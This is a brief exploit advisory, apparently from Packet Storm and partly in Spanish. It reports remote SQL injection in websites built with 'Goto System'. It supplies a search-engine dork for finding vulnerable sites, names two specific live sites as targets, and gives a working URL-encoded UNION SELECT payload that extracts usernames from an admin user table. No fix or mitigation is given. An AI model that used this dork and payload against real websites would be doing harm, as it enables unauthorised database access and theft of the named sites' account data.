Goto System suffers from a remote SQL injection vulnerability.
620bec0e53e63e9f36373909ac6b5c9455621cf51bd5b781f88c0e4ebd0a745b**********************************************
********************ruben_linux***************
**********************************************
******vulnerable a injeccion remota SQL*******
autor==>ruben_linux
equipo=>ruben_linux
[+] DORK: "Desarrollado por Goto System" inurl:"php=ID"
[+] URL: http://www.foxurbanracing.es/articulo.php?id= [slqi]
[+] URL: http://www.stylauto.net/coche.php?id= [sqli]
[+] DEMO:
http://www.stylauto.net/coche.php?id=999999.9+UNION+ALL+SELECT+%28SELECT+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28usuarios.nick+as+char%29%29%29%2C0x27%2C0x7e%29+FROM+%60admin_stylauto%60.usuarios+Order+by+nick+LIMIT+2%2C1%29+%2C0x31303235343830303536--
***********************************************
******************ruben_linux******************
***********************************************
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed